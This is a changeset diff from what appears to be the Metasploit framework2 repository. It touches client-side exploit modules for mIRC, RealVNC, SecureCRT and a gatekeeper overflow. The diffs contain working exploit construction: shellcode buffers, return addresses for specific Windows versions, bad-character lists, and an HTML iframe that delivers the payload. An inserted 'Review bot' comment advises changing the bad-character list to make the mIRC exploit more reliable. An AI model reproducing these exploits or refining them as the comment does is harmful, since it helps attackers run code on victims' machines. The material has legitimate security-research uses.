Changeset 3811
- Timestamp:
- 08/10/06 01:59:49 (2 years ago)
- Files:
-
- framework2/trunk/exploits/gatekeeper_overflow.pm (modified) (1 diff)
- framework2/trunk/exploits/mirc_url.pm (modified) (9 diffs)
- framework2/trunk/exploits/realvnc_client.pm (modified) (7 diffs)
- framework2/trunk/exploits/securecrt_ssh1.pm (modified) (4 diffs)
framework2/trunk/exploits/gatekeeper_overflow.pm
r3810 r3811 42 42 }), 43 43 44 # XXX NEEDS REFS 44 45 'Refs' => 45 46 [ framework2/trunk/exploits/mirc_url.pm
r3810 r3811 21 21 'Chunked' => [1, 'Enable chunked transfer encoding'], 22 22 }; 23 23 24 24 my $info = 25 25 { … … 32 32 creating a specially-crafted URL with a long string in the 33 33 "irc" protocol, a remote attacker can overflow a buffer and 34 execute arbitrary code on the system with privileges of the user.34 execute arbitrary code on the system with privileges of the user. 35 35 }), 36 36 … … 50 50 'Space' => 350, 51 51 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c", 52 'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",52 'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44", 53 53 'Keys' => ['-bind', '+ws2ord'], 54 54 }, 55 55 56 'Encoder' =>57 {58 'Keys' => [ '+alphanum' ],59 },56 'Encoder' => 57 { 58 'Keys' => [ '+alphanum' ], 59 }, 60 60 61 61 'Refs' => 62 62 [ 63 [ 'BID', '8819' ],63 [ 'BID', '8819' ], 64 64 ], 65 65 … … 67 67 'Targets' => 68 68 [ 69 [ 'Windows 2000 Pro All English', 0x75022ac4 ],69 [ 'Windows 2000 Pro All English', 0x75022ac4 ], 70 70 ], 71 71 72 72 'Keys' => [ 'mirc' ], 73 73 … … 90 90 Listen => 1, 91 91 Proto => 'tcp' 92 );92 ); 93 93 my $client; 94 94 … … 100 100 101 101 my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ? 102 Pex::Utils::SourceIP('1.2.3.4') :103 $self->GetVar('HTTPHOST');102 Pex::Utils::SourceIP('1.2.3.4') : 103 $self->GetVar('HTTPHOST'); 104 104 105 105 $self->PrintLine("[*] Waiting for connections to http://". $httphost .":". 
$self->GetVar('HTTPPORT') ."/"); … … 119 119 # Set the remote host information 120 120 my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr); 121 122 121 123 122 # Read the HTTP command 124 123 my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3); 125 124 my $agent; 126 125 127 126 # Read in the HTTP headers 128 127 while ((my $line = $fd->RecvLine(10))) { 129 128 130 129 $line =~ s/^\s+|\s+$//g; 131 130 132 131 my ($var, $val) = split(/\:/, $line, 2); 133 132 … … 137 136 $agent = $val if $var =~ /User-Agent/i; 138 137 } 139 138 140 139 $self->PrintLine("[*] Client connected from $rhost:$rport ($agent)"); 141 140 … … 149 148 my $target = $self->Targets->[$self->GetVar('TARGET')]; 150 149 my $shellcode = $self->GetVar('EncodedPayload')->Payload; 151 my $filler = $self->MakeNops(1442 - length($shellcode));152 my $sploit = $filler. $shellcode. "\xeb\x06\x42\x96". pack('V', $target->[1]).153 $self->MakeNops(10). "\xe8".pack('V',-435);154 my $data = qq|150 my $filler = $self->MakeNops(1442 - length($shellcode)); 151 my $sploit = $filler. $shellcode. "\xeb\x06\x42\x96". pack('V', $target->[1]). 152 $self->MakeNops(10). "\xe8".pack('V',-435); 153 my $data = qq| 155 154 156 155 <html> 157 156 <head> 158 157 <title>One second please...</title> 159 <iframe src= irc://$sploit</iframe>158 <iframe src="irc://$sploit"></iframe> 160 159 </head> 161 <body id="oClientCaps">160 <body> 162 161 One second please... 163 162 </body> framework2/trunk/exploits/realvnc_client.pm
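Review bot: Now that the iframe `src` on new line 158 is wrapped in double quotes, a `\x22` byte anywhere in `$sploit` terminates the attribute early, yet `BadChars` on line 51 still does not list it; I'd change that line to `'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x22",`. The `+alphanum` encoder keeps the payload body clear of that byte, and the fixed bytes appended on lines 151-152 (`\xeb\x06\x42\x96`, `pack('V', 0x75022ac4)`, `pack('V', -435)`) happen to avoid it for the one listed target, but a different target address or the `MakeNops` filler is not passed through the encoder, and whether `MakeNops` honors `BadChars` is not visible from this section. Separately, `$agent` on line 139 is interpolated into the log line even when the client sent no `User-Agent` header, which produces an uninitialized-value warning under `use warnings`; `$agent = 'unknown' unless defined $agent;` just before that `PrintLine` would close it. The subroutine that serves the HTTP request starts and ends outside this section.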
r3810 r3811 46 46 'BadChars' => "\x00", 47 47 'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44", 48 'MaxNops' => 0,48 'MaxNops' => 0, 49 49 'Keys' => [ '-ws2ord', '-bind' ], 50 50 }, … … 54 54 [ 'BID', '2305' ], 55 55 [ 'CVE', '2001-0167' ], 56 [ 'URL', 'http://www1.corest.com/common/showdoc.php?idxseccion=10&idx=116' ],56 [ 'URL', 'http://www1.corest.com/common/showdoc.php?idxseccion=10&idx=116' ], 57 57 ], 58 58 … … 63 63 [ 'Windows 2000 SP4 English', 0x7c2ec68b ], 64 64 [ 'Windows XP SP2 English', 0x76b43ae0 ], 65 [ 'Windows 2003 SP1 English', 0x76aa679b ],65 [ 'Windows 2003 SP1 English', 0x76aa679b ], 66 66 ], 67 67 … … 94 94 ReuseAddr => 1, 95 95 Listen => 1, 96 Proto => 'tcp'); 96 Proto => 'tcp' 97 ); 98 97 99 my $client; 98 100 … … 126 128 ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr); 127 129 128 my $filler = $self->MakeNops(993 - length($shellcode)); 130 my $filler = $self->MakeNops(993 - length($shellcode)); 129 131 130 132 my $first = … … 132 134 133 135 my $second = 134 "\x00\x00\x00\x00\x00\x00\x04\x06". $filler. $shellcode. 135 pack('V', $target->[1]). $self->MakeNops(10). "\xe8".pack('V', -457).136 Pex::Text::AlphaNumText(200);137 136 "\x00\x00\x00\x00\x00\x00\x04\x06". $filler. $shellcode. 137 pack('V', $target->[1]). $self->MakeNops(10). "\xe8".pack('V', -457). 138 Pex::Text::AlphaNumText(200); 139 138 140 $self->PrintLine("[*] VNC Client connected from $rhost:$rport..."); 139 141 … … 152 154 153 155 $fd->Send($second); 154 156 155 157 $self->Handler($fd); 156 158 157 159 $fd->Close(); 158 160 } framework2/trunk/exploits/securecrt_ssh1.pm
r3810 r3811 29 29 Beta 2. By sending a vulnerable client an overly long 30 30 SSH1 protocol identifier string, it is possible to execute 31 arbitrary code.31 arbitrary code. 32 32 }), 33 33 … … 56 56 [ 57 57 [ 'BID', '5287' ], 58 [ 'CVE', '2002-1059' ],58 [ 'CVE', '2002-1059' ], 59 59 ], 60 60 … … 63 63 'Targets' => 64 64 [ 65 [ 'SecureCRT.exe (3.4.4)', 0x0041b3e0 ],65 [ 'SecureCRT.exe (3.4.4)', 0x0041b3e0 ], 66 66 [ 'Windows 2000 SP4 English', 0x77e14c29 ], 67 67 [ 'Windows XP SP2 English', 0x77d57447 ], … … 130 130 131 131 my $sploit = 132 "SSH-1.1-OpenSSH_3.6.1p2\r\n". Pex::Text::AlphaNumText(243). 133 pack('V', $target->[1]). $self->MakeNops(20). $shellcode;132 "SSH-1.1-OpenSSH_3.6.1p2\r\n". Pex::Text::AlphaNumText(243). 133 pack('V', $target->[1]). $self->MakeNops(20). $shellcode; 134 134 135 135 $self->PrintLine("[*] Client connected from $rhost:$rport...");
